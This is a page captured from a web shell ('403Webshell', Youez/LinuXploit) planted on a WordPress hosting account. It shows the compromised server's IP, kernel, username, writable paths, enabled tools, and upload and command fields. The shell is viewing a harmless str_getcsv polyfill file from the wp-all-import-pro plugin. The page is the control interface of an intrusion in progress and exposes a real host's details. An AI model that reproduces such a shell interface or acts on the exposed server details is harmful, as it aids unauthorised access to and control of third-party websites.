403Webshell
Server IP : 172.67.158.161  /  Your IP : 3.145.74.249
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/sieuthiweb.com.vn/wp-content/plugins/wp-all-import-pro/helpers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/sieuthiweb.com.vn/wp-content/plugins/wp-all-import-pro/helpers/str_getcsv.php
<?php
if ( ! function_exists('str_getcsv')):
/**
 * str_getcsv function for PHP less than 5.3
 * @see http://php.net/manual/en/function.str-getcsv.php
 * NOTE: function doesn't support escape paramter (in correspondance to fgetcsv not supporting it prior 5.3)
 */
function str_getcsv($input, $delimiter=',', $enclosure='"') {
	if ("" == $delimiter) $delimiter = ',';
	$temp = fopen("php://memory", "rw");
	fwrite($temp, $input);
	fseek($temp, 0);
	$r = fgetcsv($temp, strlen($input), $delimiter, $enclosure);
	fclose($temp);
	return $r;
}

endif;

Youez - 2016 - github.com/yon3zu
LinuXploit